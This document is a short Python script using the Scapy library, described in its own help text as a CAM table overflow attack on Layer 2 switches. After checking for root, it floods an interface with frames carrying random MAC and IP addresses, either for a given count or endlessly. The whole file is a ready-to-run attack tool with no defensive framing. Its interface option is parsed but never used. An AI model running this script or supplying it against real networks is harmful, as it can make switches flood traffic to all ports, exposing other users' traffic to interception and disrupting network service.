#!/usr/bin/env python3

import argparse
from scapy.all import *

iface = get_working_if()

parser = argparse.ArgumentParser(add_help=True,
    description="Perform CAM overflow attack on Layer 2 switches")

parser.add_argument('-i', help='interface name', default=get_working_if())
parser.add_argument('-c', help='count of packets to send')
args = parser.parse_args()

if os.getuid() != 0:
    print("Must be superuser.")
    sys.exit(1)

pkt = Ether(src=RandMAC(),dst=RandMAC())/IP(src=RandIP(),dst=RandIP())
if args.c:
    sendp(pkt, iface=iface, count=int(args.c))
else:
    sendp(pkt, iface=iface, loop=1)

# vim:sw=4:ts=4:sts=4:et:cc=80
# End of file
